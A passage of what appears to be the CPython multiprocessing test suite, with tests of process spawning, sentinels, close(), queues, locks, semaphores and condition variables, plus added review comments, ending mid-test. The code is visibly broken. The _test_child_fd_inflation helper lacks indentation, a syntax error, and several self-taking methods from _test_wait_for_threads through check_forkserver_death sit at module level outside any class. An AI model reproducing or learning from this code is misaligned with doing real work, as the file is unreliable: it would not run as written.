    def _test_recursion(cls, wconn, id):
        """Send *id*, then recursively spawn two children up to depth 2.

        NOTE(review): the parameter name ``id`` shadows the builtin; all
        visible callers pass it positionally.
        """
        wconn.send(id)
        if len(id) < 2:
            for i in range(2):
                p = cls.Process(
                    target=cls._test_recursion, args=(wconn, id+[i])
                    )
                p.start()
                p.join()
    def test_recursion(self):
        """Recursively spawned children report ids in depth-first order."""
        rconn, wconn = self.Pipe(duplex=False)
        self._test_recursion(wconn, [])
        time.sleep(DELTA)
        result = []
        while rconn.poll():
            result.append(rconn.recv())
        # Depth-first traversal of the binary spawn tree, root first.
        expected = [
            [],
            [0],
            [0, 0],
            [0, 1],
            [1],
            [1, 0],
            [1, 1]
        ]
        self.assertEqual(result, expected)
    @classmethod
    def _test_sentinel(cls, event):
        """Child entry point: block (up to 10s) until *event* is set."""
        event.wait(10.0)
    def test_sentinel(self):
        """Process.sentinel is invalid before start, ready only after exit."""
        if self.TYPE == "threads":
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        event = self.Event()
        p = self.Process(target=self._test_sentinel, args=(event,))
        # Accessing sentinel before start() must raise.
        with self.assertRaises(ValueError):
            p.sentinel
        p.start()
        self.addCleanup(p.join)
        sentinel = p.sentinel
        self.assertIsInstance(sentinel, int)
        self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
        event.set()
        p.join()
        self.assertTrue(wait_for_handle(sentinel, timeout=1))
    @classmethod
    def _test_close(cls, rc=0, q=None):
        """Child entry point: optionally wait on *q*, then exit with *rc*."""
        if q is not None:
            q.get()
        sys.exit(rc)
    def test_close(self):
        """close() is rejected while alive, then frees the Process object."""
        if self.TYPE == "threads":
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        q = self.Queue()
        p = self.Process(target=self._test_close, kwargs={'q': q})
        p.daemon = True
        p.start()
        self.assertEqual(p.is_alive(), True)
        # Child is still alive, cannot close
        with self.assertRaises(ValueError):
            p.close()
        q.put(None)
        p.join()
        self.assertEqual(p.is_alive(), False)
        self.assertEqual(p.exitcode, 0)
        p.close()
        # Any further use of a closed Process must raise.
        with self.assertRaises(ValueError):
            p.is_alive()
        with self.assertRaises(ValueError):
            p.join()
        with self.assertRaises(ValueError):
            p.terminate()
        # close() is idempotent.
        p.close()
        # Verify the closed object can actually be garbage-collected.
        wr = weakref.ref(p)
        del p
        gc.collect()
        self.assertIs(wr(), None)
        close_queue(q)
    def test_many_processes(self):
        """Many children start, exit and terminate cleanly under load."""
        if self.TYPE == 'threads':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        sm = multiprocessing.get_start_method()
        # spawn is slow; keep the count small there.
        N = 5 if sm == 'spawn' else 100
        # Try to overwhelm the forkserver loop with events
        procs = [self.Process(target=self._test_sleep, args=(0.01,))
                 for i in range(N)]
        for p in procs:
            p.start()
        for p in procs:
            join_process(p)
        for p in procs:
            self.assertEqual(p.exitcode, 0)
        procs = [self.Process(target=self._sleep_some)
                 for i in range(N)]
        for p in procs:
            p.start()
        time.sleep(0.001)  # let the children start...
        for p in procs:
            p.terminate()
        for p in procs:
            join_process(p)
        if os.name != 'nt':
            exitcodes = [-signal.SIGTERM]
            if sys.platform == 'darwin':
                # bpo-31510: On macOS, killing a freshly started process with
                # SIGTERM sometimes kills the process with SIGKILL.
                exitcodes.append(-signal.SIGKILL)
            for p in procs:
                self.assertIn(p.exitcode, exitcodes)
    def test_lose_target_ref(self):
        """Process must not keep its target alive after the run completes."""
        c = DummyCallable()
        wr = weakref.ref(c)
        q = self.Queue()
        p = self.Process(target=c, args=(q, c))
        del c
        p.start()
        p.join()
        # The only remaining references were held by p; the target
        # must now be collectable.
        self.assertIs(wr(), None)
        self.assertEqual(q.get(), 5)
        close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
    def test_child_fd_inflation(self):
        # Number of fds in child processes should not grow with the
        # number of running children.
        if self.TYPE == 'threads':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        sm = multiprocessing.get_start_method()
        if sm == 'fork':
            # The fork method by design inherits all fds from the parent,
            # trying to go against it is a lost battle
            self.skipTest('test not appropriate for {}'.format(sm))
        N = 5
        evt = self.Event()
        q = self.Queue()
        procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
                 for i in range(N)]
        for p in procs:
            p.start()
        try:
            # Every child must see the same fd count, regardless of how many
            # siblings were already running when it was spawned.
            fd_counts = [q.get() for i in range(N)]
            self.assertEqual(len(set(fd_counts)), 1, fd_counts)
        finally:
            evt.set()
            for p in procs:
                p.join()
            close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
    """Child helper: start one non-daemon and one daemon thread.

    func1 (non-daemon) sets *evt* after 0.5s; func2 (daemon) would clear
    it after 20s.  If the child correctly waits only for non-daemon
    threads at exit, *evt* ends up set when the child terminates.
    """
    def func1():
        time.sleep(0.5)
        evt.set()
    def func2():
        time.sleep(20)
        evt.clear()
    threading.Thread(target=func1).start()
    threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
    # A child process should wait for non-daemonic threads to end
    # before exiting
    if self.TYPE == 'threads':
        self.skipTest('test not appropriate for {}'.format(self.TYPE))
    evt = self.Event()
    proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
    proc.start()
    proc.join()
    # evt is set by the non-daemon thread and would be cleared by the
    # daemon one; it being set proves the child waited for the former only.
    self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(cls, evt, break_std_streams=None):
    """Child helper: break the requested std streams, then set *evt*.

    *break_std_streams* maps a stream name ('stdout'/'stderr') to an
    action: 'close' installs a closed io.StringIO, 'remove' installs
    None.  The child is still expected to exit cleanly even though
    flushing the stream at interpreter shutdown will fail.
    """
    # Use None instead of a mutable {} default (classic Python pitfall);
    # the original dict was never mutated, so behavior is unchanged.
    if break_std_streams is None:
        break_std_streams = {}
    for stream_name, action in break_std_streams.items():
        if action == 'close':
            stream = io.StringIO()
            stream.close()
        else:
            assert action == 'remove'
            stream = None
        # Bug fix: install the prepared *stream* object.  The original
        # code always installed None here, which left the closed StringIO
        # as a dead store and made 'close' indistinguishable from 'remove'.
        setattr(sys, stream_name, stream)
    evt.set()
def test_error_on_stdio_flush_1(self):
    # Check that Process works with broken standard streams
    # (broken on the *parent* side before the child is spawned).
    streams = [io.StringIO(), None]
    streams[0].close()
    for stream_name in ('stdout', 'stderr'):
        for stream in streams:
            old_stream = getattr(sys, stream_name)
            setattr(sys, stream_name, stream)
            try:
                evt = self.Event()
                proc = self.Process(target=self._test_error_on_stdio_flush,
                                    args=(evt,))
                proc.start()
                proc.join()
                # The child must have run and still exited cleanly.
                self.assertTrue(evt.is_set())
                self.assertEqual(proc.exitcode, 0)
            finally:
                # Always restore the real stream for subsequent tests.
                setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
    # Same as test_error_on_stdio_flush_1(), but standard streams are
    # broken by the child process
    for stream_name in ('stdout', 'stderr'):
        for action in ('close', 'remove'):
            old_stream = getattr(sys, stream_name)
            try:
                evt = self.Event()
                proc = self.Process(target=self._test_error_on_stdio_flush,
                                    args=(evt, {stream_name: action}))
                proc.start()
                proc.join()
                # The child broke its own stream yet must exit cleanly.
                self.assertTrue(evt.is_set())
                self.assertEqual(proc.exitcode, 0)
            finally:
                setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
    """Child helper: sleep *delay* seconds, then set *evt*.

    NOTE(review): first parameter is named ``self`` on a classmethod;
    harmless since it is bound implicitly.
    """
    time.sleep(delay)
    evt.set()
def check_forkserver_death(self, signum):
    # bpo-31308: if the forkserver process has died, we should still
    # be able to create and run new Process instances (the forkserver
    # is implicitly restarted).
    if self.TYPE == 'threads':
        self.skipTest('test not appropriate for {}'.format(self.TYPE))
    sm = multiprocessing.get_start_method()
    if sm != 'forkserver':
        # Only the forkserver start method has a forkserver process
        # whose death can be simulated here.
        self.skipTest('test not appropriate for {}'.format(sm))
    from multiprocessing.forkserver import _forkserver
    _forkserver.ensure_running()
    # First process sleeps 500 ms
    delay = 0.5
    evt = self.Event()
    proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
    proc.start()
    # Kill the forkserver while the first child is still running.
    pid = _forkserver._forkserver_pid
    os.kill(pid, signum)
    # give time to the fork server to die and time to proc to complete
    time.sleep(delay * 2.0)
    # A second Process must still work (forkserver restarted on demand).
    evt2 = self.Event()
    proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
    proc2.start()
    proc2.join()
    self.assertTrue(evt2.is_set())
    self.assertEqual(proc2.exitcode, 0)
    proc.join()
    self.assertTrue(evt.is_set())
    # 255 is tolerated: the first child's exit status may be lost when
    # its forkserver parent dies underneath it.
    self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
    # Catchable signal: forkserver should survive or be restarted.
    self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
    # Uncatchable signal (POSIX only; Windows has no SIGKILL).
    if os.name != 'nt':
        self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
    """Worker process that upper-cases strings sent over a Pipe.

    Protocol: the parent calls submit(s) to send a string and receive
    its upper-cased echo; sending None (stop()) terminates the child's
    recv loop.  Each side closes the pipe end it does not use so EOF
    propagates correctly.
    """
    def __init__(self):
        multiprocessing.Process.__init__(self)
        self.child_conn, self.parent_conn = multiprocessing.Pipe()
    def run(self):
        # Child side: drop the parent end, then serve until None arrives.
        self.parent_conn.close()
        for s in iter(self.child_conn.recv, None):
            self.child_conn.send(s.upper())
        self.child_conn.close()
    def submit(self, s):
        # Parent side: round-trip one string.
        assert type(s) is str
        self.parent_conn.send(s)
        return self.parent_conn.recv()
    def stop(self):
        # Parent side: send the sentinel and release both ends.
        self.parent_conn.send(None)
        self.parent_conn.close()
        self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
    """Tests for subclassing multiprocessing.Process and for child-side
    shutdown behavior (stderr flush, sys.exit handling)."""
    ALLOWED_TYPES = ('processes',)
    def test_subclassing(self):
        uppercaser = _UpperCaser()
        uppercaser.daemon = True
        uppercaser.start()
        self.assertEqual(uppercaser.submit('hello'), 'HELLO')
        self.assertEqual(uppercaser.submit('world'), 'WORLD')
        uppercaser.stop()
        uppercaser.join()
    def test_stderr_flush(self):
        # sys.stderr is flushed at process shutdown (issue #13812)
        if self.TYPE == "threads":
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        testfn = test.support.TESTFN
        self.addCleanup(test.support.unlink, testfn)
        proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
        proc.start()
        proc.join()
        with open(testfn, 'r') as f:
            err = f.read()
            # The whole traceback was printed
            self.assertIn("ZeroDivisionError", err)
            self.assertIn("test_multiprocessing.py", err)
            self.assertIn("1/0 # MARKER", err)
    @classmethod
    def _test_stderr_flush(cls, testfn):
        # Child: redirect stderr to a file, then crash so the traceback
        # must be flushed to it at shutdown.
        fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
        sys.stderr = open(fd, 'w', closefd=False)
        1/0 # MARKER
    @classmethod
    def _test_sys_exit(cls, reason, testfn):
        # Child: redirect stderr to a file and exit with *reason*.
        fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
        sys.stderr = open(fd, 'w', closefd=False)
        sys.exit(reason)
    def test_sys_exit(self):
        # See Issue 13854
        if self.TYPE == 'threads':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        testfn = test.support.TESTFN
        self.addCleanup(test.support.unlink, testfn)
        # Non-integer sys.exit() arguments: message goes to stderr and
        # the exit code becomes 1.
        for reason in (
            [1, 2, 3],
            'ignore this',
        ):
            p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
            p.daemon = True
            p.start()
            join_process(p)
            self.assertEqual(p.exitcode, 1)
            with open(testfn, 'r') as f:
                content = f.read()
            self.assertEqual(content.rstrip(), str(reason))
            os.unlink(testfn)
        # Integer-convertible arguments map to the corresponding exit code.
        cases = [
            ((True,), 1),
            ((False,), 0),
            ((8,), 8),
            ((None,), 0),
            ((), 0),
        ]
        for args, expected in cases:
            with self.subTest(args=args):
                p = self.Process(target=sys.exit, args=args)
                p.daemon = True
                p.start()
                join_process(p)
                self.assertEqual(p.exitcode, expected)
#
#
#
def queue_empty(q):
    """Return True if *q* currently holds no items.

    Prefers q.empty() when the queue provides it; otherwise falls back
    to comparing q.qsize() against zero.
    """
    probe = getattr(q, 'empty', None)
    if probe is not None:
        return probe()
    return q.qsize() == 0
def queue_full(q, maxsize):
    """Return True if *q* is at capacity.

    Prefers q.full() when the queue provides it; otherwise compares
    q.qsize() against the expected *maxsize*.
    """
    probe = getattr(q, 'full', None)
    return probe() if probe is not None else q.qsize() == maxsize
class _TestQueue(BaseTestCase):
    """Tests for multiprocessing.Queue / JoinableQueue (all flavors).

    self.Queue / self.Process / self.Event come from the mixin, so the
    same tests run for raw processes, managers and threads.
    """
    @classmethod
    def _test_put(cls, queue, child_can_start, parent_can_continue):
        # Child: once allowed to start, drain the six items the parent
        # put, then let the parent continue.
        child_can_start.wait()
        for i in range(6):
            queue.get()
        parent_can_continue.set()
    def test_put(self):
        MAXSIZE = 6
        queue = self.Queue(maxsize=MAXSIZE)
        child_can_start = self.Event()
        parent_can_continue = self.Event()
        proc = self.Process(
            target=self._test_put,
            args=(queue, child_can_start, parent_can_continue)
            )
        proc.daemon = True
        proc.start()
        self.assertEqual(queue_empty(queue), True)
        self.assertEqual(queue_full(queue, MAXSIZE), False)
        # Exercise every put() calling convention.
        queue.put(1)
        queue.put(2, True)
        queue.put(3, True, None)
        queue.put(4, False)
        queue.put(5, False, None)
        queue.put_nowait(6)
        # the values may be in buffer but not yet in pipe so sleep a bit
        time.sleep(DELTA)
        self.assertEqual(queue_empty(queue), False)
        self.assertEqual(queue_full(queue, MAXSIZE), True)
        # Full-queue puts must fail immediately (non-blocking) or after
        # the requested timeout (blocking).
        put = TimingWrapper(queue.put)
        put_nowait = TimingWrapper(queue.put_nowait)
        self.assertRaises(pyqueue.Full, put, 7, False)
        self.assertTimingAlmostEqual(put.elapsed, 0)
        self.assertRaises(pyqueue.Full, put, 7, False, None)
        self.assertTimingAlmostEqual(put.elapsed, 0)
        self.assertRaises(pyqueue.Full, put_nowait, 7)
        self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
        self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
        self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
        self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
        self.assertTimingAlmostEqual(put.elapsed, 0)
        self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
        self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
        # Let the child drain the queue.
        child_can_start.set()
        parent_can_continue.wait()
        self.assertEqual(queue_empty(queue), True)
        self.assertEqual(queue_full(queue, MAXSIZE), False)
        proc.join()
        close_queue(queue)
    @classmethod
    def _test_get(cls, queue, child_can_start, parent_can_continue):
        # Child: once allowed to start, fill the queue for the parent.
        child_can_start.wait()
        #queue.put(1)
        queue.put(2)
        queue.put(3)
        queue.put(4)
        queue.put(5)
        parent_can_continue.set()
    def test_get(self):
        queue = self.Queue()
        child_can_start = self.Event()
        parent_can_continue = self.Event()
        proc = self.Process(
            target=self._test_get,
            args=(queue, child_can_start, parent_can_continue)
            )
        proc.daemon = True
        proc.start()
        self.assertEqual(queue_empty(queue), True)
        child_can_start.set()
        parent_can_continue.wait()
        time.sleep(DELTA)
        self.assertEqual(queue_empty(queue), False)
        # Hangs unexpectedly, remove for now
        #self.assertEqual(queue.get(), 1)
        # Exercise every get() calling convention.
        self.assertEqual(queue.get(True, None), 2)
        self.assertEqual(queue.get(True), 3)
        self.assertEqual(queue.get(timeout=1), 4)
        self.assertEqual(queue.get_nowait(), 5)
        self.assertEqual(queue_empty(queue), True)
        # Empty-queue gets must fail immediately (non-blocking) or after
        # the requested timeout (blocking).
        get = TimingWrapper(queue.get)
        get_nowait = TimingWrapper(queue.get_nowait)
        self.assertRaises(pyqueue.Empty, get, False)
        self.assertTimingAlmostEqual(get.elapsed, 0)
        self.assertRaises(pyqueue.Empty, get, False, None)
        self.assertTimingAlmostEqual(get.elapsed, 0)
        self.assertRaises(pyqueue.Empty, get_nowait)
        self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
        self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
        self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
        self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
        self.assertTimingAlmostEqual(get.elapsed, 0)
        self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
        self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
        proc.join()
        close_queue(queue)
    @classmethod
    def _test_fork(cls, queue):
        for i in range(10, 20):
            queue.put(i)
        # note that at this point the items may only be buffered, so the
        # process cannot shutdown until the feeder thread has finished
        # pushing items onto the pipe.
    def test_fork(self):
        # Old versions of Queue would fail to create a new feeder
        # thread for a forked process if the original process had its
        # own feeder thread. This test checks that this no longer
        # happens.
        queue = self.Queue()
        # put items on queue so that main process starts a feeder thread
        for i in range(10):
            queue.put(i)
        # wait to make sure thread starts before we fork a new process
        time.sleep(DELTA)
        # fork process
        p = self.Process(target=self._test_fork, args=(queue,))
        p.daemon = True
        p.start()
        # check that all expected items are in the queue
        for i in range(20):
            self.assertEqual(queue.get(), i)
        self.assertRaises(pyqueue.Empty, queue.get, False)
        p.join()
        close_queue(queue)
    def test_qsize(self):
        q = self.Queue()
        try:
            self.assertEqual(q.qsize(), 0)
        except NotImplementedError:
            # qsize relies on sem_getvalue, missing on some platforms.
            self.skipTest('qsize method not implemented')
        q.put(1)
        self.assertEqual(q.qsize(), 1)
        q.put(5)
        self.assertEqual(q.qsize(), 2)
        q.get()
        self.assertEqual(q.qsize(), 1)
        q.get()
        self.assertEqual(q.qsize(), 0)
        close_queue(q)
    @classmethod
    def _test_task_done(cls, q):
        # Worker: consume items until the None sentinel, acknowledging each.
        for obj in iter(q.get, None):
            time.sleep(DELTA)
            q.task_done()
    def test_task_done(self):
        queue = self.JoinableQueue()
        workers = [self.Process(target=self._test_task_done, args=(queue,))
                   for i in range(4)]
        for p in workers:
            p.daemon = True
            p.start()
        for i in range(10):
            queue.put(i)
        # join() returns only once every put item was task_done()'d.
        queue.join()
        # One sentinel per worker to shut them down.
        for p in workers:
            queue.put(None)
        for p in workers:
            p.join()
        close_queue(queue)
    def test_no_import_lock_contention(self):
        with test.support.temp_cwd():
            module_name = 'imported_by_an_imported_module'
            with open(module_name + '.py', 'w') as f:
                f.write("""if 1:
                import multiprocessing
                q = multiprocessing.Queue()
                q.put('knock knock')
                q.get(timeout=3)
                q.close()
                del q
            """)
            with test.support.DirsOnSysPath(os.getcwd()):
                try:
                    # Importing the module uses a Queue at import time; it
                    # must not deadlock against the import lock.
                    __import__(module_name)
                except pyqueue.Empty:
                    self.fail("Probable regression on import lock contention;"
                              " see Issue #22853")
    def test_timeout(self):
        q = multiprocessing.Queue()
        start = time.monotonic()
        self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
        delta = time.monotonic() - start
        # bpo-30317: Tolerate a delta of 100 ms because of the bad clock
        # resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
        # failed because the delta was only 135.8 ms.
        self.assertGreaterEqual(delta, 0.100)
        close_queue(q)
    def test_queue_feeder_donot_stop_onexc(self):
        # bpo-30414: verify feeder handles exceptions correctly
        if self.TYPE != 'processes':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        class NotSerializable(object):
            def __reduce__(self):
                raise AttributeError
        with test.support.captured_stderr():
            q = self.Queue()
            q.put(NotSerializable())
            q.put(True)
            self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
            close_queue(q)
        with test.support.captured_stderr():
            # bpo-33078: verify that the queue size is correctly handled
            # on errors.
            q = self.Queue(maxsize=1)
            q.put(NotSerializable())
            q.put(True)
            try:
                self.assertEqual(q.qsize(), 1)
            except NotImplementedError:
                # qsize is not available on all platform as it
                # relies on sem_getvalue
                pass
            self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
            # Check that the size of the queue is correct
            self.assertTrue(q.empty())
            close_queue(q)
    def test_queue_feeder_on_queue_feeder_error(self):
        # bpo-30006: verify feeder handles exceptions using the
        # _on_queue_feeder_error hook.
        if self.TYPE != 'processes':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        class NotSerializable(object):
            """Mock unserializable object"""
            def __init__(self):
                self.reduce_was_called = False
                self.on_queue_feeder_error_was_called = False
            def __reduce__(self):
                self.reduce_was_called = True
                raise AttributeError
        class SafeQueue(multiprocessing.queues.Queue):
            """Queue with overloaded _on_queue_feeder_error hook"""
            @staticmethod
            def _on_queue_feeder_error(e, obj):
                if (isinstance(e, AttributeError) and
                        isinstance(obj, NotSerializable)):
                    obj.on_queue_feeder_error_was_called = True
        not_serializable_obj = NotSerializable()
        # The captured_stderr reduces the noise in the test report
        with test.support.captured_stderr():
            q = SafeQueue(ctx=multiprocessing.get_context())
            q.put(not_serializable_obj)
            # Verify that q is still functioning correctly
            q.put(True)
            self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
        # Assert that the serialization and the hook have been called correctly
        self.assertTrue(not_serializable_obj.reduce_was_called)
        self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
    def test_closed_queue_put_get_exceptions(self):
        for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
            q.close()
            with self.assertRaisesRegex(ValueError, 'is closed'):
                q.put('foo')
            with self.assertRaisesRegex(ValueError, 'is closed'):
                q.get()
#
#
#
class _TestLock(BaseTestCase):
    """Basic acquire/release semantics for Lock and RLock."""
    def test_lock(self):
        lock = self.Lock()
        self.assertEqual(lock.acquire(), True)
        # Non-blocking re-acquire of a held (non-reentrant) lock fails.
        self.assertEqual(lock.acquire(False), False)
        self.assertEqual(lock.release(), None)
        # Releasing an unheld lock raises (exact type differs per backend).
        self.assertRaises((ValueError, threading.ThreadError), lock.release)
    def test_rlock(self):
        lock = self.RLock()
        # Reentrant: the owner may acquire repeatedly...
        self.assertEqual(lock.acquire(), True)
        self.assertEqual(lock.acquire(), True)
        self.assertEqual(lock.acquire(), True)
        # ...and must release the same number of times.
        self.assertEqual(lock.release(), None)
        self.assertEqual(lock.release(), None)
        self.assertEqual(lock.release(), None)
        self.assertRaises((AssertionError, RuntimeError), lock.release)
    def test_lock_context(self):
        # Lock must be usable as a context manager.
        with self.Lock():
            pass
class _TestSemaphore(BaseTestCase):
    """Counting and bounded semaphore behavior, including timeouts."""
    def _test_semaphore(self, sem):
        # Shared body: walk the counter 2 -> 0 and back, checking the
        # value after each transition (where get_value is implemented).
        self.assertReturnsIfImplemented(2, get_value, sem)
        self.assertEqual(sem.acquire(), True)
        self.assertReturnsIfImplemented(1, get_value, sem)
        self.assertEqual(sem.acquire(), True)
        self.assertReturnsIfImplemented(0, get_value, sem)
        # Non-blocking acquire at zero must fail without changing the count.
        self.assertEqual(sem.acquire(False), False)
        self.assertReturnsIfImplemented(0, get_value, sem)
        self.assertEqual(sem.release(), None)
        self.assertReturnsIfImplemented(1, get_value, sem)
        self.assertEqual(sem.release(), None)
        self.assertReturnsIfImplemented(2, get_value, sem)
    def test_semaphore(self):
        sem = self.Semaphore(2)
        self._test_semaphore(sem)
        # A plain Semaphore may be released past its initial value.
        self.assertEqual(sem.release(), None)
        self.assertReturnsIfImplemented(3, get_value, sem)
        self.assertEqual(sem.release(), None)
        self.assertReturnsIfImplemented(4, get_value, sem)
    def test_bounded_semaphore(self):
        sem = self.BoundedSemaphore(2)
        self._test_semaphore(sem)
        # Currently fails on OS/X
        #if HAVE_GETVALUE:
        #    self.assertRaises(ValueError, sem.release)
        #    self.assertReturnsIfImplemented(2, get_value, sem)
    def test_timeout(self):
        if self.TYPE != 'processes':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        sem = self.Semaphore(0)
        acquire = TimingWrapper(sem.acquire)
        # Non-blocking forms return immediately...
        self.assertEqual(acquire(False), False)
        self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
        self.assertEqual(acquire(False, None), False)
        self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
        self.assertEqual(acquire(False, TIMEOUT1), False)
        self.assertTimingAlmostEqual(acquire.elapsed, 0)
        # ...while blocking forms honor the given timeout.
        self.assertEqual(acquire(True, TIMEOUT2), False)
        self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
        self.assertEqual(acquire(timeout=TIMEOUT3), False)
        self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
    """Condition variable tests: notify/notify_all/notify(n), timeouts,
    wait_for, and wakeup via signal delivery."""
    @classmethod
    def f(cls, cond, sleeping, woken, timeout=None):
        # Worker: announce sleeping, wait on the condition, announce woken.
        cond.acquire()
        sleeping.release()
        cond.wait(timeout)
        woken.release()
        cond.release()
    def assertReachesEventually(self, func, value):
        # Poll func() up to 10 times (plus one settling delay) before the
        # final assertion; tolerates backends without get_value().
        for i in range(10):
            try:
                if func() == value:
                    break
            except NotImplementedError:
                break
            time.sleep(DELTA)
        time.sleep(DELTA)
        self.assertReturnsIfImplemented(value, func)
    def check_invariant(self, cond):
        # this is only supposed to succeed when there are no sleepers
        if self.TYPE == 'processes':
            try:
                sleepers = (cond._sleeping_count.get_value() -
                            cond._woken_count.get_value())
                self.assertEqual(sleepers, 0)
                self.assertEqual(cond._wait_semaphore.get_value(), 0)
            except NotImplementedError:
                pass
    def test_notify(self):
        cond = self.Condition()
        sleeping = self.Semaphore(0)
        woken = self.Semaphore(0)
        # One process and one thread both wait on the same condition.
        p = self.Process(target=self.f, args=(cond, sleeping, woken))
        p.daemon = True
        p.start()
        self.addCleanup(p.join)
        p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
        p.daemon = True
        p.start()
        self.addCleanup(p.join)
        # wait for both children to start sleeping
        sleeping.acquire()
        sleeping.acquire()
        # check no process/thread has woken up
        time.sleep(DELTA)
        self.assertReturnsIfImplemented(0, get_value, woken)
        # wake up one process/thread
        cond.acquire()
        cond.notify()
        cond.release()
        # check one process/thread has woken up
        time.sleep(DELTA)
        self.assertReturnsIfImplemented(1, get_value, woken)
        # wake up another
        cond.acquire()
        cond.notify()
        cond.release()
        # check other has woken up
        time.sleep(DELTA)
        self.assertReturnsIfImplemented(2, get_value, woken)
        # check state is not mucked up
        self.check_invariant(cond)
        p.join()
    def test_notify_all(self):
        cond = self.Condition()
        sleeping = self.Semaphore(0)
        woken = self.Semaphore(0)
        # start some threads/processes which will timeout
        for i in range(3):
            p = self.Process(target=self.f,
                             args=(cond, sleeping, woken, TIMEOUT1))
            p.daemon = True
            p.start()
            self.addCleanup(p.join)
            t = threading.Thread(target=self.f,
                                 args=(cond, sleeping, woken, TIMEOUT1))
            t.daemon = True
            t.start()
            self.addCleanup(t.join)
        # wait for them all to sleep
        for i in range(6):
            sleeping.acquire()
        # check they have all timed out
        for i in range(6):
            woken.acquire()
        self.assertReturnsIfImplemented(0, get_value, woken)
        # check state is not mucked up
        self.check_invariant(cond)
        # start some more threads/processes
        for i in range(3):
            p = self.Process(target=self.f, args=(cond, sleeping, woken))
            p.daemon = True
            p.start()
            self.addCleanup(p.join)
            t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
            t.daemon = True
            t.start()
            self.addCleanup(t.join)
        # wait for them to all sleep
        for i in range(6):
            sleeping.acquire()
        # check no process/thread has woken up
        time.sleep(DELTA)
        self.assertReturnsIfImplemented(0, get_value, woken)
        # wake them all up
        cond.acquire()
        cond.notify_all()
        cond.release()
        # check they have all woken
        self.assertReachesEventually(lambda: get_value(woken), 6)
        # check state is not mucked up
        self.check_invariant(cond)
    def test_notify_n(self):
        cond = self.Condition()
        sleeping = self.Semaphore(0)
        woken = self.Semaphore(0)
        # start some threads/processes
        for i in range(3):
            p = self.Process(target=self.f, args=(cond, sleeping, woken))
            p.daemon = True
            p.start()
            self.addCleanup(p.join)
            t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
            t.daemon = True
            t.start()
            self.addCleanup(t.join)
        # wait for them to all sleep
        for i in range(6):
            sleeping.acquire()
        # check no process/thread has woken up
        time.sleep(DELTA)
        self.assertReturnsIfImplemented(0, get_value, woken)
        # wake some of them up
        cond.acquire()
        cond.notify(n=2)
        cond.release()
        # check 2 have woken
        self.assertReachesEventually(lambda: get_value(woken), 2)
        # wake the rest of them
        cond.acquire()
        cond.notify(n=4)
        cond.release()
        self.assertReachesEventually(lambda: get_value(woken), 6)
        # doesn't do anything more
        cond.acquire()
        cond.notify(n=3)
        cond.release()
        self.assertReturnsIfImplemented(6, get_value, woken)
        # check state is not mucked up
        self.check_invariant(cond)
    def test_timeout(self):
        # wait(timeout) with no notifier must return False after ~timeout.
        cond = self.Condition()
        wait = TimingWrapper(cond.wait)
        cond.acquire()
        res = wait(TIMEOUT1)
        cond.release()
        self.assertEqual(res, False)
        self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
    @classmethod
    def _test_waitfor_f(cls, cond, state):
        # Child: signal readiness (state 0), then wait until state reaches 4.
        with cond:
            state.value = 0
            cond.notify()
            result = cond.wait_for(lambda : state.value==4)
            if not result or state.value != 4:
                sys.exit(1)
    @unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
    def test_waitfor(self):
        # based on test in test/lock_tests.py
        cond = self.Condition()
        state = self.Value('i', -1)
        p = self.Process(target=self._test_waitfor_f, args=(cond, state))
        p.daemon = True
